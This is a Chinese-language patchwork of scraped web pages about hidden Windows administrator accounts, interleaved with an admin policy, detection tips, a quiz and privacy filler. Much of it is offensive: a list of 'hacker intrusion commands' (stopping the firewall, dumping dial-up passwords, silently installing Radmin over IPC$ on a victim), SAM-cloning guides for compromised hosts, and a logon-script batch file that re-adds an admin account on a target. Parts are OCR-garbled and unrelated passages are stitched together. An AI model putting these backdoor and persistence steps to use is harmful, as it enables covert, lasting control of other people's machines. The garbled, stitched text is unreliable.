建立超级隐藏用户
系统超级用户管理细则
超级用户管理细则1总则1.1目的为加强学习(以下简称“学习")计算机信息系统和信息安全管理工作,保障学习计算机信息系统安全、保密、可靠、稳定、连续、高效运行,加强对系统超级用户的管理,结合学习实际,制定本办法。
1.2关键岗位设置信息系统超级用户是指在信息系统中拥有最高管理权限的系统用户。
根据信息系统的实际组成,分别由系统管理员、数据库管理员、应用管理员对相应的超级用户权限负责。
各应用系统需根据《学习信息系统安全管理办法》第3。
1。
3条要求设置系统管理员、数据库管理员、应用管理员岗位,并委托专人负责.系统管理员不得同时兼任数据库管理员或应用管理员。
1.2.1系统管理员拥有操作系统最高管理权限,负责对操作系统内用户权限管理、用户帐号及访问管理、密码管理;1.2.2数据库管理员拥有数据库系统最高管理权限,负责对数据库系统内用户权限管理、用户帐号及访问管理、密码管理;1.2.3应用管理员拥有应用系统最高管理权限,负责对应用系统内用户权限管理、用户帐号及访问管理、密码管理。
1.3关键岗位责任系统管理员、数据库管理员、应用管理员应按《学习信息系统关键岗位安全管理办法》的要求签订《信息系统关键岗位安全责任书》。
1.4口令强度设定信息系统应根据安全等保定级结果,根据《学习信息系统安全等级保护基本规范》中对应等保级别的要求,设定用户口令强度。
2管理流程2.1管理权限授权信息系统在建设前,项目组需根据《学习信息系统应用与运维管理办法》第3.5。
4条要求,获得项目责任处室对相应关键岗位授权.2.1.1在项目正式实施前,项目经理需根据项目建设需要确认系统管理员、数据库管理员、应用管理员,并填写《应用系统关键岗位人员基本信息表》(以下简称“基本信息表”),其中系统管理员可作为操作系统超级用户口令的保管人员。
2.1.2项目经理将填写完毕的“基本信息表”提交至项目责任处室,项目责任处室审核通过后完成签字授权.2.1.3项目经理将签字后的“基本信息表”复印两份,原件由项目责任处室归档保存,复印件由IT运维支持中心和项目经理各保存一份。
如何隐藏超级管理员用户
如何隐藏超级管理员用户一。
开始-运行regedt32HKTY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentV ersion\Winlogon\Spec ialAccounts\UserList中将Administrator中的DWORD值改成0就可以隐藏了,这个方法可以隐藏登陆时的账户,而且它也可以隐藏其它的账户,即使切换用户也是不可见的那就在Userlist中新建一个名为你要隐藏的账户为名字的DWORD值,将值改为0就可以隐藏了,也就是说只要帐户用户名和新建DWORD值为0就可以隐藏了二。
在命令提示符下创建隐藏账户:首先在”运行“下输入“cmd“进入提示符界面后输入net user lhd$ 123456 /add 回车执行成功其中lhd$为你要创建的隐藏账户123456为你要设定的密码。
如果你要将该用记设为管理员则输入以下命令net localgroup administrators lhd$ /add 回车执行成功如何查看我们的结果呢,你只要输入net user 回车我们就可以看到所有本机的账户,当然隐藏的是看不到的。
这时你会发现刚才的那个账户是看不到的,也就是说我们成功创建了隐藏账户,那么我们怎样才能看到呢,换句话问,我们怎样找到别人在自己爱机上创建的隐藏账户呢,如果是通过第一种方法隐藏的我们只有通过查看注册表项了HKTY_LOCAL_MACHINE\SJJOFTW ARE\Microsoft\WindowsNT\CurrentV ersion\Winlogon\Spec ialAccounts\UserList,如果是第二方法的话我们只要执行net user localgroup administrators 回车即可显示当前administrators 组的所有账户,如果你要查看其它用户组的话只要把administrators 更改即可如user组则改成net user localgroup user 即可。
入侵3389终结完整编
Pid 的值为在任务栏空白处点右键-->>任务管理器--->>进程中的winlogon.exe后面的数值就是PID数值
如:psu –p regedit –i 157
将Guest克成管理员权限
克成管理员权限的方法:
找到HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Names\\Administrator的类型值.
再在CMD下
CD c:\\winnt\\system32
copy termsrv.exe service.exe(这里是复制termsrv.exe为Alerter服务文件名差不多的文件)
CD C:\\winnt
sc \\\\127.0.0.1 config Alerter binpath= c:\\winnt\\system32\\service.exe(这里是从新定向Alerter服务文件.服务名一定要区分大小写A要大写)
if exists (select * from
dbo.sysobjects where id = object_id(N\'[dbo].[xp_cmdshell]\') and
OBJECTPROPERTY(id, N\'IsExtendedProc\') = 1)
exec sp_dropextendedproc N\'[dbo].[xp_cmdshell]\'
@regedit /s 1.reg
@net start r_server
@del rad.exe
@del 1.reg
@del r.bat
建立隐藏帐户方法
服务器建立超级隐藏账号方法来源:互联网作者:佚名时间:04-01 00:58:47【大中小】当黑客入侵一台主机后,会想方设法保护自己的“劳动成果”,因此会在肉鸡上留下种种后门来长时间得控制肉鸡,其中使用最多的就是账户隐藏技术。
在肉鸡上建立一个隐藏的账户,以备需要的时候使用。
账户隐藏技术可谓是最隐蔽的后门,一般用户很难发现系统中隐藏账户的存在,因此危害性很大,本文就对隐藏账户这种黑客常用的技术进行揭密。
在隐藏系统账户之前,我们有必要先来了解一下如何才能查看系统中已经存在的账户。
在系统中可以进入“命令提示符”,控制面板的“计算机管理”,“注册表” 中对存在的账户进行查看,而管理员一般只在“命令提示符”和“计算机管理”中检查是否有异常,因此如何让系统账户在这两者中隐藏将是本文的重点。
一、“命令提示符”中的阴谋其实,制作系统隐藏账户并不是十分高深的技术,利用我们平时经常用到的“命令提示符”就可以制作一个简单的隐藏账户。
点击“开始”→“运行”,输入“CMD”运行“命令提示符”,输入net user chun$ password /addnet localgroup administrators chun$ /add这样我们就利用“命令提示符”成功得建立了一个用户名为“chun$”,密码为“password”的简单“隐藏账户”,并且把该隐藏账户提升为了管理员权限。
我们来看看隐藏账户的建立是否成功。
在“命令提示符”中输入查看系统账户的命令“net u ser”,回车后会显示当前系统中存在的账户。
从返回的结果中我们可以看到刚才我们建立的“chun$”这个账户并不存在。
接着让我们进入控制面板的“管理工具”,打开其中的“计算机”,查看其中的“本地用户和组”,在“用户”一项中,我们建立的隐藏账户“chun$”暴露无疑。
可以总结得出的结论是:这种方法只能将账户在“命令提示符”中进行隐藏,而对于“计算机管理”则无能为力。
黑客常用入侵命令
黑客常用入侵命令控制面版:运行>>>>>>>>>>>:control计算机管理:command MMC结束XP防火墙进程:net stop sharedaccess查看ADSL帐号密码的代码:dialupass /allusers /stext "c:\pass.txt启动3389服务:net start TermService关闭所有防火墙的代码:cmd.exe /c net stop sharedaccessiis命令重启:iisreset /reboot用CMD命令实现路由跟踪:tracert 域名(如:)结束进程:NET SHARE查看版本:ver查看中端(服务):net start查看文件:dir查看3389:加用户:c:\winnt\system32>net user adminserver$ admin /add提权限:net localgroup administrators adminserver$ /add211.38.172.2 2180查看用户net user远程连接到主机CMD命令:telnet 主机IP踢人:logoff ID查看当前人:query user打开telnet:net start telnettelnet连接工具:OpenTelnet删除共享:net share c$=c:\删除共享:net share c$ /del启用GUEST:net user guest /active:yes为GUEST设密码:net user guest 888888提升到管理员:net localgroup "Administrators" guest /add超级用户隐藏器:c:\door adminserver$:admin克隆帐号:ca \\IP 你建立的帐号密码肉机默认帐号密码ca \\127.0.0.1 adminserver$ admin adminserver admin完全禁止系统模认工享[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComput er\NameSpace\DelegateFolders\{59031a47-3f72-44a7-89c5-5595fe6b30ee}]3389替换服务-----------------------中修改[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]c:\winnt\system32\copy termsrv.exe service.exec:\winnt\system32\cd..c:\winnt\sc \\127.0.0.1 config Alerter binpath= c:\winnt\system32\service.exe端口转向:f:\web\ftp.exe "c:\fpipe.exe -v -l 开放的端口-r 要转向的端口ip"使用空口令连接:net use \\对方IP\ipc$ "" /user:"administrator"(在上传文件的目录下)远程复制文件:c:\radmin>net use \\a-01\ipc$ "12345" /user:administratorc:\ramdin>copy r_server.exe \\a-01\admin$\system32c:\ramdin>copy radmin.reg \\a-01\admin$\sytem32在对方CMD下:c:\winnt\system32\>regedit /s radmin.regc:\winnt\system32\>r_server.exe /install /silenecnet start r_servercopy r_server.exe \\对方IP\admin$\system32c:\opentelnet.exe \\IP ADMINISTRATOR "" 0 90copy 文件名\\IP\admin$\system32进入对方CMD:c:\opentelnet.exe \\Ip administrator "" 0 90登陆CMD:c:\telnet IP 90安装RADMIN:c:\winnt\system32\r_server /install silencec:\winnt\system32\r-server导入注册表:c:\winnt\system32\regedit.exe /s aaa.reg看端口:c:\winnt\system32\netstat -an改端口:c:\winnt\system32\r_server.exe /port:1024 /pass:1234 /save /silence起动服务:c:\winnt\system32\net start r_server隐藏文件:c:\winnt\system32\attrib.exe +h r_server.exe +h%systemroot$\system32看看共享开了没有,没有的话把共享开开c:\winnt\system32>net share清单是空的。
隐藏id锁教程
隐藏id锁教程隐藏ID锁是一种高级的保护个人隐私的技术,其作用是隐藏用户的身份信息,以防止个人信息被泄露或滥用。
隐藏ID锁的使用范围非常广泛,包括在社交媒体平台、在线游戏和实时聊天等场景中。
隐藏ID锁的原理是在用户注册或登陆时,将真实的个人身份信息替换为一个虚拟的ID,以代替用户在社交交互中的显示名字或昵称。
这样做的好处是保护用户的隐私,防止个人信息被恶意获取或滥用,同时也给用户提供了更大的自由度,让他们在虚拟世界中更好地保护自己。
隐藏ID锁的实现方法有多种,下面介绍其中两种常见的方法。
首先是使用随机生成的ID。
在用户注册时,系统会自动为用户生成一个随机的ID,作为用户在社交媒体等平台上的显示名字。
这个随机的ID并不与用户的真实身份相关联,保护了用户的隐私。
用户在进行社交交互时,其他用户只能看到这个随机ID,而无法得知用户的真实身份。
其次是虚拟化显示名字。
这种方法是用户可以自己选择要显示的名称,但与真实的身份信息无关。
用户可以使用任何昵称或虚拟名字,而不必透露自己的真实身份。
这样既保护了用户的隐私,又给用户提供了更大的自由度,使用户能够更好地在虚拟世界中表达自己。
为了实现隐藏ID锁的效果,需要社交媒体平台、在线游戏等服务提供商在系统中加入相应的技术支持。
他们需要开发相应的算法和数据存储方式,以保证用户的真实身份信息被保护起来,并且只显示隐藏的ID。
同时,用户在注册时也需要提供一些基本的信息,以便服务提供商能够对用户进行身份验证或管理。
隐藏ID锁对于用户来说是非常有用的,它能够保护个人的隐私,避免个人信息被泄露或滥用。
对于社交媒体平台和在线游戏等服务提供商来说,隐藏ID锁也是一个很好的功能,因为它可以吸引更多的用户,提高用户的黏性和满意度。
综上所述,隐藏ID锁是一种有益的技术,可以有效地保护用户的个人隐私。
它的应用范围广泛,对用户和服务提供商都有好处。
希望随着技术的发展,隐藏ID锁能够在更多的应用场景中得到应用,为用户提供更好的保护和体验。
有隐藏id要注意什么吗
有隐藏id要注意什么吗隐藏ID是指在网络上使用的一个特定标识,可以用来保护个人隐私并在一定程度上减少信息泄漏的风险。
在现今数字化时代,我们的个人信息容易受到黑客、网络追踪和广告商的追踪。
因此,了解如何保护和使用隐藏ID非常重要。
在本文中,我将详细介绍一些关于隐藏ID的重要事项以及如何正确使用它。
首先,我们需要明确隐藏ID的定义与用途。
隐藏ID指的是一个不直接与个人身份相关联的标识符。
在网络上,它可以是一个伪造的名字、匿名化的用户名或者是一个随机生成的字符串。
使用隐藏ID的目的是为了保护个人隐私和减少个人信息被滥用的风险。
比如,在社交媒体平台上使用隐藏ID可以避免个人信息被他人追踪和滥用。
接下来,我将介绍一些使用隐藏ID时需要注意的重要事项。
1. 选择一个不容易与个人身份相关联的隐藏ID。
当选择一个隐藏ID时,应避免使用与自己的真实身份直接相关的信息,比如姓名、生日、电话号码等。
应使用随机的字母、数字和符号的组合来构建一个不容易被猜测的隐藏ID。
2. 不要在不受信任的网站或平台上使用隐藏ID。
在选择使用隐藏ID的平台时,应注意平台的可靠性和安全性。
不要在不受信任的、没有安全措施的平台上使用隐藏ID,以免个人信息被他人滥用。
3. 使用虚拟专用网络(VPN)隐藏真实IP地址。
虚拟专用网络(VPN)是一种可以通过将网络流量进行加密和路由来隐藏真实IP地址的工具。
使用VPN可以帮助用户隐藏真实位置和扰乱黑客的追踪。
4. 不要在公共场所或不安全的网络上使用隐藏ID。
在使用隐藏ID时,应避免在公共场所、不安全的无线网络或者其他容易被窃听的网络上使用隐藏ID。
这些网络可能存在安全风险,黑客或窃听者可能会盗取个人信息。
5. 注意社交媒体隐私设置。
在使用隐藏ID的社交媒体平台上,应注意设置相应的隐私设置。
将个人信息设置为仅对好友可见或仅对特定的用户组可见,以减少个人信息泄漏的风险。
6. 不要泄露过多个人信息。
在使用隐藏ID的同时,应避免泄露过多的个人信息。
小心,系统里有隐形人!
特 隐 人 S se 殊 身 y tm账户
隐藏指 数★★★ ☆ 危险指数★★★
外 卧 ¥ 来 底 账户
隐藏指 数★★ ★★ ☆ 危险指数 ★★ ★★ ★ 大 家知道 , 果 在共 享 目录 后面 添加 上 ¥ 这个 共享 就 变成 隐 藏共 享 如 ,
在每个人的系统中还存在一个特殊的
隐身 者~ 一 s s m账户 , vt e 它是 系统 执行 操
作 的执行账户。 即使在 计算 机管理 窗口中,
我们也 无法 看到它 的踪 影。 很 多人感 觉 不 到它 的 存在 , 实 , 其 只 要打 开任务 管理 器 , 换到 “ 切 进程 ” 标签 , 单 击菜 单 栏 的 “ 看 一选 择 列 ” 在 打 开 查 , 的窗 口勾选 “ 用户名 ” 单 击 “ 定 ” 回 , 确 返
同样 的 , 在账 户名称后 面加 上¥ 这个 账户 就变 得和A mii rtr 样 , d ns ao- t
隐身
假设我 的电脑 被某 个黑 客人侵 了, 么他 就很 可能输入命令 “ t s 那 Ne ue r p d 2 4 6/ d 这样 就 在 系统 中偷 偷建 立 了名为p d , 录 密码 是 c ¥13 5 a ”, d c¥ 登
看 到 Ad n rt r miitao 的身 s
他 们 会发 现 一 个 陌 生 隐藏 者 一 一As n t pe 账 户 。这个 到 底 是 什 么 账 户 ?难 道 是 黑 客 建 立 的 ?其 实 , 是 我 们 在 安 装 . t 它 Ne Fa ok 系统 自动产 生的账户。 rmw r后
创 建的用户, 目的是使 用这个权限较少 的用
户 来执行ap e w 的进程 , 以增 强安全 snt p _ 可
一步一步教你如何创建超级隐藏账户
建立超级隐藏账户1.建立新用户:开始----→运行,输入cmd--→确定。
在命令提示符输入:net user www$ 123 /add通过上面的密令及创建好一个帐号是www$,密码是123的账户。
2.查看新建的账户:在命令提示符输入:net user 。
3.提升www$账户的管理员权限:我的电脑--→右击--→管理。
展开本地用户和组,双击用户。
在右边的对话框找到刚刚建立的www$账户--→右击--→属性。
在www$属性对话框点隶属于。
添加--→高级--→立即查找,找到Administrators组,点3次确定,就把www$账户提升为管理员账户了。
4.在注册表设置隐藏账户:提升Administrator的权限,开始----→运行,输入regedit--→确定,展开到下图的路径选中SAM,右击-- 权限,把完全控制勾上,确定。
展开到下图的路径选中Administrator,在右边的对话框查看它的类型,并在Users下面的路径中找到与它相对应的类型,双击F,选中我选中的那些数值数据,复制,确定再到Names路径下面找到www$,找到相对应的类型,打开它的类型,双击F,选中下图的数据类型,把刚刚在与Aministrator相对应的类型中复制到的数值数据粘贴到下图选中的地方再把www$与它相对应的类型导出到桌面关闭注册表。
5.删除www$账户:开始----→运行,输入cmd--→确定。
输入:net user www$ /del 。
6.导入从注册表导出的文件,在桌面找到刚刚从注册表导出的两个文件,双击就行了。
7.查看账户建立成功没有:我的电脑--→右击--→管理。
展开本地用户和组,双击用户。
现在查看www$账户,如果发现没有了,这就可以了。
注销,用你刚刚建立的账户登录试试看。
行了。
查看电脑有没有被别人攻击
360安全卫士
最后,奉劝各位没装杀软裸奔的“能人”们,除非你真的认为自己是高手,不然还是装上款杀软比较好。
查看电脑是否被别人控制。
暑假了,冒险的人也多了起来了。同时盗号的也越来越猖狂了。教大家一个方法,右键我的电脑选管理-----共享文件夹-----绘话。 如果有人控制你电脑的话这里应该会显示他的IP 如果你是XP 你还可以与他对话。 你也可以马上结束他,也就是断绝被控制了。。。 然后查杀电脑。。* I+ o, m2 G1 O6 O
等别人给你发来东西,你看到后缀名是.exe的就要小心了。
3.系统补丁打不全。管理员密码不设置或设置的太简单,都会给黑客留下可乘之机。对于这些问题的防范,我会在后面写到。
★中了木马有什么样的表现?
1,你中了马被人远程控制,在进程里可能会出现一些你没见过的进程,如1.exe,不过病毒也会有这样的表现。
0 D% X |. m8 Q4 O0 H
四 端口的相关工具 T7 P2 W3 R1 V8 e/ T7 ?/ o' w; s
- G$ y3 }; g6 Q% _1 _+ V6 _
中级网络安全管理练习题(含答案)
中级网络安全管理练习题(含答案)一、单选题(共80题,每题1分,共80分)1、下面有关计算机的叙述中,正确的是()。
A、计算机键盘上字母键的排列方式是随机的B、计算机的主机只包括CPUC、计算机必须具有硬盘才能工作D、计算机程序必须装载到内存中才能执行正确答案:C2、计算机信息系统,是指由计算机及其相关的和配套的设备、设施(含网络)构成的,按照一定的应用目标和规则对()进行采集、加工、存储、传输、检索等处理的人机系统。
A、计算机B、程序C、计算机软件D、信息正确答案:D3、防火墙截断内网主机与外网通信,由防火墙本身完成与外网主机通信,然后把结果传回给内网主机,这种技术称为()A、透明代理B、内容中转C、内容过滤D、地址转换正确答案:A4、计算机发生的所有动作都是受()控制的。
A、主板B、CPUC、内存D、显卡正确答案:B5、网络层的主要任务是提供()。
A、路径选择服务B、进程通信服务C、端-端连接服务D、物理连接服务正确答案:A6、在工作组中使用一个非本地计算机(计算机名:W104)的共享资源(共享名:2K-C)时,“映射网络驱动器”窗口中的“驱动器”文本框中,选择网络驱动器的代号,例如”G”,在“路经”文本框中,输入的符合UNC的格式为()。
A、\\W104\\2K-CB、\\W104\2K-CC、//W104\2K-CD、//W104/2K-C正确答案:B7、在支持分布式对象访问的桩/框架(Stub/Skeleton)结构中,桩/框架主要是依据()生成的。
A、分布式对象自身B、构件的接口C、服务端代码D、客户端代码正确答案:B8、进行等级保护定义的最后一个环节是:()A、信息系统的安全保护等级由系统服务安全保护等级决定B、信息系统的安全保护等级由业务信息安全保护等级和系统服务安全保护等级的较低者决定C、信息系统的安全保护等级由业务信息安全保护等级和系统服务安全保护等级的较高者决定D、信息系统的安全保护等级由业务信息安全保护等级决定正确答案:C9、黑客攻击服务器以后,习惯建立隐藏用户,下列()用户在DOS命令net user下是不会显示的。
win7无法使用超级管理员帐户使用指纹识别解决方案
win7无法使用超级管理员帐户使用指纹识别解决方案在Windows 7操作系统中,普通用户账户默认不具备管理员权限,用户需要输入管理员密码才能执行需要管理员权限的操作。
然而,一些用户可能希望使用指纹识别功能来解锁其计算机并获得管理员权限,但这在Windows 7中并不直接支持。
因此,本文将介绍一种解决方案,使Win7可以通过指纹识别获得超级管理员权限。
Step1:启用隐藏的超级管理员账户首先,我们需要启用操作系统中的隐藏超级管理员账户。
Follow these steps to enable the hidden super administrator account:1. 在Win7的开始菜单中,找到“计算机”,右键单击并选择“管理”选项。
2.在计算机管理窗口中,选择“本地用户和组”>“用户”。
3.右键单击右侧窗口中的“管理员”账户,并选择“属性”选项。
4.在管理员属性窗口中,取消勾选“账户已被禁用”选项,并单击“确定”。
5.在本地用户和组窗口中,双击“隐藏的管理员”账户。
6.在隐藏的管理员属性窗口中,取消勾选“账户已被禁用”选项,并单击“确定”。
7.等待系统将隐藏的管理员账户准备好。
Step 2:设置指纹识别解锁超级管理员完成以上步骤后,我们可以通过以下步骤将指纹识别作为解锁超级管理员账户的方法。
2.安装完成后,打开该软件并进行指纹注册。
遵循软件提示,将要使用的指纹放置在指纹扫描仪上,以便将其与您的帐户相关联。
3.完成指纹注册后,关闭指纹软件。
4.重新启动计算机并登录到隐藏的超级管理员账户。
5.在开始菜单中,找到并打开"控制面板"。
6.在控制面板中,选择"账户类型更改"。
7.选择您的普通用户账户并将其类型更改为"管理员"。
8.重新启动计算机并登录到您的普通用户账户。
至此,您已成功将指纹识别作为解锁隐藏超级管理员账户的方法。
当您登录到普通用户账户时,系统会自动执行管理员权限所需的操作。
如何查看系统中的隐藏用户
另外如果大家怕麻烦,可以直接打开注册表,然后选中HKEY_LOCAL_MACHINE\SAM,打开“文件”菜单并选择“导出”命令将该键值导出,当怀疑被非法创建隐藏账户时只需要双击导出的注册表文件,将其重新导入注册表即可将隐藏的账户删除。
Байду номын сангаас
如何查看系统中隐藏的超级用户来源:网络资源 2009-08-28 16:42:24
[标签:查看 系统 超级]高考热点资讯 免费订阅 很多朋友反映自己的电脑好像存在一个“第三者”,但是无论是直接打开系统之中的账户管理器,还是在命令提示符中通过“net user”命令都找不到丝毫的蛛丝马迹。
难道这就说明电脑之中没有其它非法的账号存在吗?非也,因为有很多黑客会通过修改注册表的HKEY_LOCAL_MACHINE\SAM来创建隐藏的账号,常规的查看方法是无法看到的。
此时就可以看到在SAM子键下多出两个子键,即SAM\SAM\Domains和SAM\SAM\Rxact。依次展开SAM\SAM\Domains\Account\Users\Names,在Names下的各个子键就是当前系统所有的账户列表,包括隐藏的账户,如果发现该列表中与系统账户管理或者使用net user看到的用户不一致,那么则可证明是非法创建的秘密账户,直接将其对应的子键删除即可。
要查看自己的电脑中是否有隐藏的账号存在,那么必须从源头上入手,即查看注册表相应键值。打开“运行”窗口,输入“regedit”后回车打开注册表编辑器。在左侧依次选择HKEY_LOCAL_MACHINE\SAM,右击SAM子键,在弹出的菜单中选择“权限”,在打开的权限设置窗口中单击“添加”按钮将当前账户加入,并把权限设为“完全控制”,单击“确定”按钮返回。
Win7隐藏用户及登陆隐藏用户的方法
一、Win7系统登录界面用户名隐藏方法Windows系统中,很多用户都是默认使用administrator 帐户自动登陆的。
从安全的角度来讲,默认使用administrator 帐户自动登陆做肯定是有重大的安全隐患,因为把Vista或者Windows 7中的UAC功能避开不用真的是件很out的事情。
真正的高手是不会对微软的UAC 机制嗤之以鼻的,因为那个确实非常有效的抵御了没有数字签名的和一些恶意软件的运行。
1、Win键+R键打开运行窗口,输入regedit 并运行,打开注册表编辑器——2、定位到:HKEY_LOCAL_MACHING\SOFTWARE\Microsoft\Windows NT\CurrentVersion\然后新建Winlogon\SpecialAccounts\UserList 节点,并在UserList 这个节点下新建一个DWORD 32位的值,键名设置为administrator 值设为0 。
3、注销Win7,重启一下试试看。
1打开安全策略:运行-输入:“gpedit.msc”-到本地安全策略编辑器-window设置-安全设置-本地策略-安全选项-交互式登录: 不显示最后的用户名-启用(因为这样才可以进行隐藏用户名和密码的输入,如果不启用交互式登录: 不显示最后的用户名的话,在登入页面时个别电脑WIN7系统没有切换的按键,所以请务必启用)2启用成功后,注销现在用户,然后看到一个要输入用户名和密码的界面,那好,输入我们之前注册的隐藏用户和密码(用户名:zeng$ 密码:123456)OK,进入(注意:一定要知道管理员以及其他用户名以及密码,密码一人知即可///如果记不住用户名或者密码,否则无法登入到现在的用户,也就是管理员用户,或则其他用户,在下面我们会讲到如何查看用户名以和更改,密码无法查看和更改,但一定需要一人知道)3那我们怎么样切换到之前的用户,输入之前的用户名:administrator (系统一般都是这个用户名,如果不是可以去查看,如果嫌太长记不住也可以修改,具体做法请看以下方法法)以及密码,没密码直接进入,OK,搞定!。
如何隐藏用户
今天,我教大家如何隐藏用户。
第一步,右键单击我的电脑
第二部,打开管理,展开用户和组,选“用户”
第三部,在右面空白部分单击右键,点新用户。
会出现这样一个框框
第四部,输入用户名,把下面的“用户下次登录时须更改密码”的项取消,再选上“用户不能更改密码”的这个项。
如图所示:
第五步,点创建,然后关掉这个框,我们会发现我们刚刚建立的用户,之后双击这个新建用户的头像,会出现一个属性的框,弹出之后点框中的“隶属于”的项
第六步更改隶属于再出现的“隶属于”项中单击“添加
第七步,再弹出的对话框中选高级,并弹出高级,如图所示:
第八步,单机立即查找,并在查找到得组中找到“Backup Operators”,随后单击“确定”
第九步继续单击确定
第十部,删除users这个组,并应用
随后一个隐藏的用户便制作好了,这个用户无论是在开机的欢迎屏幕,还是控制面板,或Documents and Settings文件夹里都显示不到!看图:
但是大家可能会问,如何使用这个用户呢?其实很简单,再开机的时候(指设了密码,并开机时出现欢迎屏幕)我们按先按Ctrl和Alt再按2次del就会出项用户登录面板,再用户名上输入你建立的用户名就可以了。
神隐模式 标准 增强
神隐模式标准增强神隐模式是指在特定情况下,用户可以选择隐藏其在网络上的活动轨迹和个人信息,以保护个人隐私和数据安全。
随着网络安全意识的提高,越来越多的人开始关注并使用神隐模式,以防止个人信息被滥用或泄露。
本文将介绍神隐模式的标准和增强方法,帮助用户更好地保护自己的隐私和数据安全。
首先,神隐模式的标准包括但不限于以下几点:1. 浏览器隐私模式,大多数现代浏览器都提供了隐私浏览模式,用户可以在此模式下浏览网页而不留下任何浏览历史、Cookie、临时文件等信息。
使用隐私模式可以有效防止个人浏览记录被他人获取。
2. 匿名搜索引擎,有些搜索引擎提供了匿名搜索的功能,用户可以在不留下搜索历史的情况下进行搜索。
这样可以避免搜索记录被用于个性化广告或其他用途。
3. 隐私设置,在使用各种应用和社交平台时,用户应该仔细设置自己的隐私选项,限制他人对个人信息的访问。
例如,可以设定只有好友可以查看自己的动态、个人资料等信息。
4. 加密通讯,在进行网络通讯时,尤其是涉及个人隐私的信息传输时,应选择安全加密的通讯方式,避免信息被窃取或监听。
以上是神隐模式的标准,但仅仅依靠这些标准还不足以完全保护个人隐私和数据安全。
因此,我们还可以采取一些增强措施来进一步加强神隐模式的效果:1. 使用VPN,虚拟私人网络(VPN)可以有效隐藏用户的真实IP地址,加密网络通讯数据,避免被网络窃听。
使用VPN可以在一定程度上保护用户的上网隐私。
2. 定期清理浏览器数据,尽量定期清理浏览器的历史记录、Cookie、缓存等数据,避免这些数据被滥用。
可以使用浏览器的隐私清理功能或第三方清理工具来进行清理。
3. 谨慎使用公共Wi-Fi,在使用公共Wi-Fi时,尽量避免访问涉及个人隐私的重要网站或应用,以免信息被不法分子窃取。
4. 避免点击可疑链接,谨慎对待来自陌生人或不明来源的链接,避免点击可能包含恶意软件或钓鱼网站的链接。
通过采取以上增强措施,可以更好地保护个人隐私和数据安全,使神隐模式发挥最大的效果。
用批处理建立隐藏超级管理员账户
如果把里面的内容改成
@echo off
net user administrator 123456 /add
意思是不管你怎么改,下次启动管理员帐号administrator密码一直是123456
用批处理建立隐藏超级管理员账户(2009/11/22 11:47)目录: 公司动态
浏览字体:大 中 小
@echo off
net user admin$ 123 /add & net localgroup administrators admin$ /add
这段命令相信大家都很熟悉了,“net user admin$ 123 /add”用与建立一个帐户名为admin$密码为:123的帐户
1、在自己电脑里面建立一个.txt文本文件.
2、在里面输入内容
@echo off
net user hacker57 123456 /add 注释:前面hacker57是用户名后面123456是密码;
net localgroup administrators hacker57 /add
3、把这个文件保存,更改后缀为hacker57.bat 注释:前面名字随便,后面格式一定要是bat;
4、把这个文件拷贝到对方电脑C:\WINNT\system32\GroupPolicy\User\Scripts\Logon文件目录下,没有的话自己创建。
完成,下次对方电脑无论如何都有这个管理员帐号,删除了,下次启动还有!
net user admin$ /del
此命令作用是删除帐户admin$
regedit /s c:\1.reg
导入1.reg
完成,把上面几段命令复制到文本文档,然后另存为任意文件名的bat文件运行即可。
Windows中多种隐藏超级用户方法
Windows中多种隐藏超级用户方法一、如何在图形界面建立隐藏的超级用户图形界面下适用本地或开3389终端服务的肉鸡上。
上面我提到的那位作者说的方法很好,但是较为复杂,还要用到psu.exe(让程序以系统用户身份运行的程序),如果在肉鸡上的话还要上传psu.exe。
我说的这个方法将不用到psu.exe这个程序。
因为Windows2000有两个注册表编辑器:regedit.exe和regedt32.exe。
XP中regedit.exe和regedt32.exe 实为一个程序,修改键值的权在右键中点"权限"来修改。
对regedit.exe我想大家都很熟悉,但却不能对注册表的项键设置权限,而regedt32.exe的优点就是能够对注册表的项键设置权限。
NT/2000/xp的帐户信息都在注册表的HKEY_LOCAL_MacHINESAMSAM键下,但是除了系统用户SYSTEM外,其它用户都无权查看到里面的信息,因此我首先用regedt32.exe对SAM键为我设置为"完全控制"权限。
这样就可以对SAM键内的信息进行读写了了。
具体步聚如下:1、假设我们是以超级用户administrator登录到开有终端服务的肉鸡上的,首先在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户net user hacker$ 1234 /add2、在开始/运行中输入:regedt32.exe并回车来运行regedt32.exe。
3、点"权限"以后会弹出窗口点添加将我登录时的帐户添加到安全栏内,这里我是以administrator的身份登录的,所以我就将administrator加入,并设置权限为"完全控制"。
这里需要说明一下:是添加你登录的帐户或帐户所在的组,切莫修改原有的帐户或组,否则将会带来一系列不必要的问题。
等隐藏超级用户建好以,再来这里将你添加的帐户删除即可。
如何在图形介面建立隐藏的超级用户
、如何在圖形介面建立隱藏的超級用戶圖形介面下適用本地或開3389終端服務的肉雞上。
上面我提到的那位作者說的方法很好,但是較 複雜,還要用到psu.exe(讓程式以系統用戶身份運行的程式),如果在肉雞上的話還要上傳psu.exe。
我說的這個方法將不用到psu.exe這個程式。
因 windows2000有兩個註冊表編輯器:regedit.exe和regedt32.exe。
XP中regedit.exe和regedt32.exe實 一個程式,修改鍵值的許可權時在右鍵中點“許可權”來修改。
對regedit.exe我想大家都很熟悉,但卻不能對註冊表的項鍵設置許可權,而regedt32.exe 最大的優點就是能夠對註冊表的項鍵設置許可權。
nt/2000/xp的帳戶資訊都在註冊表的HKEY_LOCAL_MACHINE\SAM\SAM鍵下,但是除了系統用戶SYSTEM外,其他用戶都無權查看到裏面的資訊,因此我首先用regedt32.exe對SAM鍵 我設置 “完全控制”許可權。
這樣就可以對SAM鍵內的資訊進行讀寫了了。
具體步聚如下:1、假設我們是以超級用戶administrator登錄到開有終端服務的肉雞上的,首先在命令行下或帳戶管理器中建立一個帳戶:hacker$,這裏我在命令行下建立這個帳戶net user hacker$ 1234 /add2、在開始/運行中輸入:regedt32.exe並回車來運行regedt32.exe。
如圖:t0013、點“許可權”以後會彈出如下窗口:t002點添加將我登錄時的帳戶添加到安全欄內,這裏我是以administrator的身份登錄的,所以我就將administrator加入,並設置許可權 “完全控制"。
這裏需要說明一下:最好是添加你登錄的帳戶或帳戶所在的組,切莫修改原有的帳戶或組,否則將會帶來一系列不必要的問題。
等隱藏超級用戶建好以,再來這裏將你添加的帳戶刪除即可。
